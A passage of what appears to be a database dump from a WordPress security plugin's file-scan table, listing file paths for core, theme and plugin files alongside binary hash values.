M','wp-includes/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('�P���\rv*ɡZ\\�','wp-includes/wp-includes/css/jquery-ui-dialog.css',0,'�b�G�-_f���kqT�','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('�g\Z��\\�\r�`=�m�','wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\r�L����{ǀ�','����VZ+��&�\r�Щ�U;�L)R�!ӵ�','',0,'?'),('�i���B�j����]','wp-includes/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G8�J+�� ��z','>8���\'X�i�Ub�Gн�,<T`6��4Ѝ�','',0,'?'),('�l8�!�y{�����+\0P','wp-content/themes/newsmag/assets/sass/layout/_layout.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aն�e=����r�','�Qq�\rM�Jv��0���<s2Kъ�j�U�','',0,'?'),('�vn�,��*x�r�$','wp-content/themes/promote/inc/kirki/assets/css/customizer-dynamic-css-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��ڮ9 %�{�\"�','�ڲ�����}ekA�����9_tu0{_.��','',0,'?'),('����v���ό�Y9�','wp-includes/ID3/getid3.lib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CPb$M6̟��ҁ�','\"\Z^�,8>K����@��湅����l��|AF��','',0,'?'),('��\Z凚T�L�a�','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php',0,'�dwi�+���M�U','�dwi�+���M�U','`ߨ=I\\�L����0Z��Y��a�g���5','',0,'?'),('��%#ߊ��D�+v�','wp-content/themes/wp-barrister/library/images/icon-vi.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2;<)3p�T�\"� B','lH��6��<�<��̒o\rB����Rs�+�','',0,'?'),('���X����H�o�v�','wp-admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�q㤭�{���$I','ŁnGĂ�M\"k�7�w\"ҥ�!�I[�1','',0,'?'),('��!N��D�w�`��[�','wp-includes/js/jquery/ui/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�屬�U��u���z̜','H7�pn�\Z��8����__E<��\r��','',0,'?'),('��U�]>�rք�{��v','wp-content/plugins/wp-cerber/assets/flags/cf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��oG��`?���','�\0�m�٢K��K��ǡNЙT��� ��','',0,'?'),('���Xp����~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�oe�~��oB2�_;','5�q��SrL�]�OX����sq����+l<��ɒ','',0,'?'),('���Bq�t����L��','wp-content/themes/newsmag/inc/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���pHr�Q�Z|��O','՚3��l����&=\r�?��w�\0��kp!�','',0,'?'),('��֗]NR���S{qv?�','wp-admin/css/wp-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*i����[p]��<','r5S�E�?29/�)��_�PJv�Vh���R�','',0,'?'),('����7��6�ɫ�','wp-includes/wp-includes/class-wp-object-cache.php',0,'�n̩$�������/V','�n̩$�������/V','���O�\Zm7l���W���2��m�_/2��$�','',0,'?'),('��\Z,z���Ґ�U�','wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y[�&A*zϦ/��?<�','�������Dn��N����AU)n�J�','',0,'?'),('���uj��s��;��','wp-content/themes/spidermag/template-homepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��0Sn�� q��Q��','��Z�1Q-�ir��u�B�rܨY�$�оu','',0,'?'),('��9_,2�Қ�J�\"�','wp-content/themes/mora/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ۚ���\n�=�Kp�O','���Q�J_�x�˯�S�\rUo�y���2�\'Z�','',0,'?'),('���3�(d����u�','wp-content/themes/event/inc/customizer/functions/frontpage-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fo%�6��Oex\Z.O�','�zG�L+ۮ�Y��,]�K��6�5���a��','',0,'?'),('��O$8��J�e��','wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H p3+$������','�I�E���|��Ap��ך�X�9n@��','',0,'?'),('��\\���L�{H��.��','wp-content/themes/kidzoo-lite/inc/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FI?�� \'�-LW���','�b#��b��\ZY:la��X3I�I�����.','',0,'?'),('��*v�<�TC�U�XJn','wp-includes/blocks/column/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\'��������E�4�','z�,�g3�l[�9�v[�=\rW�\'3e�c�INڷ�','',0,'?'),('�\0��߯NI���','wp-content/themes/twentynineteen/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�D�F/�u+:��@�','�=7���a(P�w�Ɯ&���|�������','',0,'?'),('�����n�E��','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-site-lockout-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nOΨ�J���z�<','ԥ6Wi��� F4�hd��4��ˡV8�\0ݟ�','',0,'?'),('�V�܂0\0U�`�5C>','wp-includes/css/dist/components/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�t�<���l�j�!','QR0�2�>�S��\\���}�a�sz9�<','',0,'?'),('��J$�2��3e2<','wp-content/themes/anima/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�=�!al��q�n�s','��x4k�ݖ[S�GKw�.-��/��Ʉ��R','',0,'?'),('�\rq��O����D�zs','wp-includes/pomo/pomo/translations.php',0,'��C���*\Z�\'��','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('�4�)�/�YmIfȓ\\','wp-content/themes/hueman/option-tree/assets/images/ot-select-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0>�n�<�Q� � r','1�7!@x�y9�+m�/��טbj���*��M�','',0,'?'),('�� �6��!\"�P ','wp-content/themes/twentytwentyone/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M���<HC�:@�','�H�E���\rA��l8k#�h�@w�}�}','',0,'?'),('�\Z� �R����[�\'�>','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('���S��D�z��','wp-includes/wp-includes/class-wp-list-util.php',0,'�}� ��Sӕvl�T@','�}� ��Sӕvl�T@','���Ԉ������?1l�\Z� ���ug�\',��','',0,'?'),('�\"�^\Z/\r�Or鷯�','wp-includes/wp-includes/Requests/Exception/HTTP/417.php',0,'Bpj�hO^�c\\G #','Bpj�hO^�c\\G #','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('�$�����j�X�])D:','wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f+ʅ�D`\0��`d->}','|�:m\"�S,�h�k���\Z8V��0d�eCe�','',0,'?'),('�\'�\0�]y����.','wp-content/themes/pine/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' f�F��TMk��+\n]L','X���d���y��/\'\\铋���o����tyV','',0,'?'),('�0B&R���D���1','wp-content/themes/promote/inc/kirki/assets/scss/controls/radio-buttonset.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�j����ֽN@>�',' �\'9Н �o��1Kf��y��q���n�0\\iA','',0,'?'),('�2�\\�17Հ�wi�{','wp-includes/js/dist/vendor/wp-polyfill.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P����$@A.0�Qt','@b�/E�ؔå��;M �ۙZRİ�x����','',0,'?'),('�7KF�veŤ��','wp-content/themes/vision-lite/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ִW|Z�ҵ3��M�C\\','�x�1�<�Z5bk��Z��h>��]_%bh�R��','',0,'?'),('�<�V���htج�','wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.min.js',0,'dX�������z҆֫','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�H_��_��z��W�A','wp-includes/wp-includes/class-wp-customize-panel.php',0,'��o�Vj�\'WB{.��u','��o�Vj�\'WB{.��u','�f)%�|u��8Jo�A�tD4�L�+����^','',0,'?'),('�H�)������jH�j','wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�\'B�l�If���\"c','��O$��U?��\nR��y���V�=�T���Z','',0,'?'),('�j%M�ɍ��p)Z��','wp-admin/images/generic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'�[#98!�','�{u���K[g͆Ex�{�:��lͨG��','',0,'?'),('�q�J+�b>�Z�<B!��','wp-includes/wp-includes/css/wp-auth-check-rtl.min.css',0,'���jv�sZ��ܻ&h�','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�~Cm���\Z��GL��9','wp-includes/wp-includes/customize/class-wp-customize-custom-css-setting.php',0,'��^Tˮ,�\"A\n�3���','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('��xT����U��M�_k','wp-content/themes/sg-window/img/icons/livejournal.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>UQM���}�n�}�','F��{���F8Y�6\r\'Aj��G�}���G�','',0,'?'),('���v�*~����ߏ','wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��8I/CM��x��','��W}u�}��v��m��7=E�K�Y4','',0,'?'),('����_.*{zQ�%�V','wp-includes/wp-includes/js/media-grid.min.js',0,'3�a\"��Å�\Z}n�K��','3�a\"��Å�\Z}n�K��','Zm��+�w��Ⱦ���d������2�D','',0,'?'),('��RKQ�5v�-�� ��','wp-includes/css/dist/edit-post/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��b�E��y�L�J��','9 �`��\'@GGXLH��K����Ħ�ᚆ','',0,'?'),('�¦P�W�z�z�N�','wp-includes/wp-includes/js/dist/core-data.js',0,'�+�;Q��z@�?#�_�','�+�;Q��z@�?#�_�','�2�Fsc�jp{�ѳtG��1D�Y0�Ƶ�QV�@��','',0,'?'),('�ȅZ�����m�>��','wp-content/themes/maxbusiness/images/brands/brand3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UOn�Zp��E)o��8','���r����ãB)\n�+W�i���:`1c�','',0,'?'),('�͆�H��õ�6��{','wp-content/themes/cactus/assets/plugins/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�y��=|^� 7','\n��ȼ^;A�b����oA��[�\0��L��T�','',0,'?'),('���;���I)6�OH�','wp-includes/wp-includes/js/dist/format-library.min.js',0,'9���h���d6��.{�','9���h���d6��.{�','�H��? �pq+���t?��l��U��n\'�o�Q�','',0,'?'),('��;(Xp`ҙ��pݷ','wp-includes/js/plupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T_\'!;��QYЦIk&Q','�I��Zh�y8s��Cv����rTVRḾ','',0,'?'),('��q-h��T�O��','wp-content/themes/anima/admin/images/logo-about-header.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�Y��r+vK�^s�tV\Z',':�� �g��}6#�NI��P�pf���T�E�','',0,'?'),('��+>f9���9�','wp-content/themes/hueman/parts/header-nav-topbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƴ�o�qQ$�؉o`��','��)���$*W(����ѱ����@��=�u','',0,'?'),('��6{$o�S�����','wp-includes/wp-includes/css/customize-preview.min.css',0,'��b���Sb�s��\"','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('��Gj#��RlҘ���β','wp-content/themes/maxbusiness/css/animate.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�҄��}Eϳ��F�LQ','==L����[��Ӧ�-�J�ZWGGs��Q�VN��;','',0,'?'),('��t�0�g�a�/��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��-����x\'� ','��{ڋ��N�o��#X�+Xe\'�����_����>\Z','',0,'?'),('�\n�qo�qZVyX��9','wp-admin/includes/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#&��9��hE�p��6�','Ǫ�s��E\'���\\l��D)i�$�����q','',0,'?'),('�qNJ,��RtG�G\'�','wp-content/themes/promote/inc/kirki/assets/js/controls/radio-buttonset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p7�3t#�tF(�O|C!','��pǻ�_o�y���`(.�g��\\�B���,','',0,'?'),('�!�+��U�U��\n&','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���I\"��cz>�','�мU�h\n5?�Iq9�L��SC0�eGDe��','',0,'?'),('�)q�\"��ff�\nlߩ|','wp-content/plugins/wp-cerber/admin/cerber-admin-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0Ow�\n��<[�Q','���呂 p�oG��r�X?���,���','',0,'?'),('�2h��E]Gc?���F','wp-content/themes/Endolf/content-search.php',0,'�.3�\\�D[o*����','�.3�\\�D[o*����','�JلR��r�� �X�c~#S�C2�f����и','',0,'?'),('�; �R���V�n@F','wp-includes/wp-includes/blocks/group/block.json',0,'6qigV�+�\'�^�N�','6qigV�+�\'�^�N�','�����Bi�B�\rv�\rM5���\n9\'�d��р9�','',0,'?'),('�QlݠI���ve]r�%','wp-includes/wp-includes/js/zxcvbn.min.js',0,'| ���#PV /{�M�_','| ���#PV /{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('�Y��!~�_���k��','wp-content/themes/kidzoo-lite/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�?Zu�@��z=��1','5��>y-��]�Gq����x5#;)�]=X��,��','',0,'?'),('�`�@�����YE�!','wp-includes/Requests/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��87a`CZ��','hI���� x<�������%��ji�����$','',0,'?'),('���KK�ܕ,@A��','wp-content/themes/advance/inc/kirki/assets/js/controls/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�����4EȋL','uఓ2*)��5���;8������[�·&�6�L','',0,'?'),('��%�����0�C\'<?�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-generic-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����*���-�','���r橛��#YW�E� �B\Zh����ʤ��','',0,'?'),('��Ư \'CԻ��ګ\Z','wp-includes/images/admin-bar-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���:�W���^','��rN!�`VO�c��K��viՀ{Fn\Z��le','',0,'?'),('��4��#հ�}��','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�j-�W�.�{��@','�i%X�Y`FmZ���E^ab}r�_E�����3�','',0,'?'),('��\"�Z0\0ؿe�Ԧp�','wp-admin/css/admin-menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T:�#}�9�H��76��','���i��O*�i������/ŝ�v�y��a��','',0,'?'),('����\"8Y��74�O<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','di�BD�J���D�5�O','N�a���i�B���\r��AO]���@�P��','',0,'?'),('����x8[!>�X','wp-admin/includes/class-wp-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�N\n�V�\r�@���&�','���)%����n�Aڛ.}����x\"�}���n','',0,'?'),('��Wm�V�1��N�\"��','wp-includes/wp-includes/js/dist/dom-ready.js',0,'�5�N�M8�![��c','�5�N�M8�![��c','O\\�Ű|�~2Zce��L\"�kOM�s�g(�\Z�','',0,'?'),('��$���W �_j�N','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',0,'���H0�c;`���W&','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('��������>��%�','wp-content/themes/wp-barrister/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�*2���.��2� �','�ob��B��Sr����WǙ�T� ��=�','',0,'?'),('����o*nFߘ7��','wp-content/plugins/wp-cerber/assets/flags/mv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'���FꠈT�[�~��','�dE4{��P�-��B������:�Þ$�{FF�','',0,'?'),('�H�������#�','wp-includes/wp-includes/widgets/class-wp-widget-pages.php',0,'�J�E,��ߓ%_�','�J�E,��ߓ%_�','<6�8��1J�ߧr(;�c�?@�|uR�\nŞ�','',0,'?'),('��ue�{X�1���','wp-includes/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�5��$ý\n �\'q0','\\��\"�ԯ-\r6��e�N�ID�zB�\r\0��','',0,'?'),('�x>ơ?.Rvǜ��\'','wp-includes/wp-includes/js/crop/cropper.css',0,'ky5�ni*M(��','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('�ON�\"OBv_\n(}ޗ','wp-includes/wp-includes/js/hoverIntent.min.js',0,'�x�m���\n8�� �','�x�m���\n8�� �','�)�K���%A�Z&�y�`M��U!�i:A�[�','',0,'?'),('�(���a���b��(�','wp-content/plugins/wordfence/css/wf-global.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ADmqc��v��d9','�(O��ӛˀԟMAW��D�0�\\��5LG�','',0,'?'),('�*�@ܺ�ԯ*�#P]','wp-content/themes/hueman/assets/admin/css/hu_admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|K��e�v�l�*��9','�qq �`���Zr��hyLYj\'����ܹ�o�-','',0,'?'),('�-�l���s�j�|','wp-includes/wp-includes/js/dist/compose.min.js',0,'i\0 ��Q�a�5���?','i\0 ��Q�a�5���?','��z~�Յ\0>�����n�ۣ�3\Z؉:C�\Z�','',0,'?'),('�/��0)���\Z�','wp-content/plugins/wordfence/views/scanner/issue-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�� \n�Ro�N7�|','~��❃gd�&w[�u������o��|t��}','',0,'?'),('�1�cUd���/R� ','wp-content/plugins/wp-cerber/assets/flags/nu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�C�����=7Ѝ�','���z��f���7?v�F�`)c�۱���s`$+','',0,'?'),('�5�G�G�x��<2','wp-content/themes/spidermag/spidermag/customizer/color-section/color-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7]99J�\ne��6�N�G','���\'���Ș�5[���v�$�D�V���','',0,'?'),('�@�q��G�-$����|�','wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����gPʋ��i��[','�DeJ�\Z�fxb� x\'P�:�����U','',0,'?'),('�F�&�>��!xr� TG','wp-content/themes/weblog/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�<Fw���a�t�b@','�H\r��(���Ѣӟ���B\r[�/!�K�','',0,'?'),('�J�:��`A�q����1','wp-content/themes/twentynineteen/images/pattern_04.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*����$[��;��R','#��(4�2L{���]����{˖e~1\'��0','',0,'?'),('�Mܙ��}K���g�\0��','wp-content/themes/wp-barrister/single-people.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UW]*�Ny6bzE? nj','ԙ�S�Z�I.��}��\n�0��Zf��iuά�X','',0,'?'),('�S���KK2iɈ','wp-includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���]�ř3F8rȃ','\'B�6E�:��bw=�#u�\0��> &���M�','',0,'?'),('�[�K� bDu �#��g','wp-includes/wp-includes/css/dist/list-reusable-blocks/style.min.css',0,'T���6JҨNM!d��$t','T���6JҨNM!d��$t','E��|���K4�g�,��_��^��,�� Ev�','',0,'?'),('�`גK��{B-q8��\r','wp-content/themes/hueman/option-tree/assets/images/ot-pre-bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʸ[g4�Mc�ͷ^O��','��,�F%\0��9�q���{9����Ni��^�M','',0,'?'),('�hɹ�Vj>�q�#��^P','wp-content/themes/maxbusiness/js/swiper.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+���P����j4�M','��R0�s��a�Qx`�O$���\r�T����','',0,'?'),('�o��s�=�������','wp-content/themes/kidzoo-lite/left-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�ߓmz�,��V1','�@ϻ@C��$�]?]\0)!ާS9kN�{','',0,'?'),('�x�_,[��5����','wp-content/plugins/wordfence/images/sort_asc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ǐ#a]2������','����[8l�Y���ckl�� ��u#KV���n','',0,'?'),('�y�g��zaU\"� XKG','wp-includes/js/hoverIntent.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z/P���ꮱ< �','t��neTR/�77�@\Zҧ0�g�nj����','',0,'?'),('��:�S>�L�r��qn','wp-content/themes/newsmag/inc/widgets/posts_list_horizontal/layouts/posts_list_horizontal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�p��7߹N8��y7�i','LF\01��ӭ�U�6���˽��^~��F�݉','',0,'?'),('����-���!ЬD\'V�','wp-content/themes/weblog/acmethemes/customizer/design-options/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�\n?uo���Q','�lݫ�z`�Ü�� ��x�h�*J��H.��K�U','',0,'?'),('��l��ۧ6�/y<','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:4FaZ�V�L�}','���T�Wt�^Z\Z U]\Z\Z%� ��[gxF','',0,'?'),('����\ZT�r���ٲ�','wp-content/themes/advance/inc/kirki/assets/scss/sections/hover.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�344�E�b\\!\n�i7�','��X��\\?!eeO���q�z��ėJD�$O0','',0,'?'),('���\0��;�w�\r(�','wp-content/themes/newsmag/inc/customizer/settings/banners/controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O%�^T�\"�ҹ\"L:��','fC0(A��s.\"�[@�*ڞ3� ]~\rf��','',0,'?'),('���jY�A#&4��*4D','wp-content/themes/promote/inc/kirki/assets/scss/controls/multicheck.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�q~t\\m9:?Z�','��CSe��yC:ү|��۩J4�$�Ji�w!\0(c','',0,'?'),('�����gFB�ZÚ(v','wp-content/themes/twentytwenty/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Xŏ������i�','���&T6bbeV%��]�R���v�Q$�/�','',0,'?'),('����i�O=�q�O�','wp-content/themes/event/inc/front-page/our-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�Q.�R���ɓ#T','cuf��u�f��7m��W::�7☁�Ҁ議�','',0,'?'),('��S�i��q�3�s?�','wp-content/themes/showcase-lite/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OD�,Y\06��/.','MWN �\Z\Z�색,&��߾Ͼ�����j\r%�U�','',0,'?'),('��I\\4͆?Ķ�L','wp-includes/wp-includes/blocks/file/block.json',0,'.��E��T �P\0\\�D','.��E��T �P\0\\�D','kr\r���.d����y%@IX���t+��Z��','',0,'?'),('���E��b�ꝼ��i�','wp-content/themes/vision-lite/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Zm�z�0�h��O','�8����-��^�.�\\���Q�a����X�','',0,'?'),('���NTZt�o\r�%��F','wp-content/plugins/wordfence/views/scanner/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tL�Ga�\0�oҠbY','2�6��l�n\r��\"� c�:�ƅz�v�J1ܶ��','',0,'?'),('����a�I-��c�18','wp-includes/wp-includes/js/plupload/license.txt',0,'u&\n�TI�z����+�','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('���?�_��x?1�','wp-content/themes/Yegor/single.php',0,'1�lK�͑Z�\'R�7�','1�lK�͑Z�\'R�7�','�v@1bF�\"�����5�>\r�� ���','',0,'?'),('����������wT','wp-includes/blocks/button/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��]��u���H(','A$\Z�\Z�d��1�����/�ހ[�7�G','',0,'?'),('�\r�Q�!5Ӈ��y�','wp-content/themes/storeone/images/featured-placeholder.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�����;m4�^��.\r','[d��r�*��@X~wy�cP5�}����(��^\Z','',0,'?'),('�o�/�d�4x`��','wp-content/plugins/akismet/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B\0,��\\�>��T��P','&���D��*n�.�[��(O����4���P��','',0,'?'),('�+Fc�0m_����Ii','wp-content/themes/twentytwentyone/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�\nq3Ԙ>�}6Y�','Ĭ{z�K��E[�j8��؈��Oݩ��r���5d�','',0,'?'),('�/�ɘ�]�^�W\\�q','wp-includes/css/wp-embed-template.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')I+�w2�h���K\"�','�6&�}�ok��AM\Z> �|�F�6,e�t\rPq','',0,'?'),('�NU}��.�����b','wp-content/themes/sg-window/inc/css/one-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l���\"K���_y#��','o�IxZ�#�[���?����R���}���L�x�','',0,'?'),('�eK���\'�����{�','wp-content/themes/pine/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',������)��$L�','�����٬��X�/(��b��샹J1��','',0,'?'),('�g�Ux��1�+DM�-','wp-content/themes/hueman/parts/post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n�eN�|��B�','GY�=�`T��m Ei�RMx��I��!Co��US�','',0,'?'),('�iq�s�.�,�[ebui','wp-includes/wp-includes/PHPMailer/Exception.php',0,'������ߡ�M(���','������ߡ�M(���','��A+�n7�51�K���i��|Y��m','',0,'?'),('�q!6�����R�>����','wp-includes/wp-includes/js/jquery/ui/slider.min.js',0,'�%��ҏ��9�4g��','�%��ҏ��9�4g��','/\0�ȷ�s�d�Z�Ʈ�6����[�-\ZM ?u','',0,'?'),('�v{L�Jlō�Yz�`�(','wp-includes/js/thickbox/thickbox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��P�R�n�,(�f�','M�ߍ��V�_�^����ol\'\0��qYL�̘)���','',0,'?'),('��u�]�p�R��','wp-content/themes/spidermag/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_7���V������Nb�|','mU�1�z�����Br��ڑ\\�����`�Z��&�','',0,'?'),('��k��V��G�d�/��','wp-content/plugins/wp-cerber/assets/flags/th.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�Vtc��3�G�G�','��o�#�ߗ|!\\A�L=Uހ��L��q�Y�p','',0,'?'),('��(��NL�; ��','wp-includes/js/dist/api-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`3~L����[�()��','y�p����e�L�84G���S 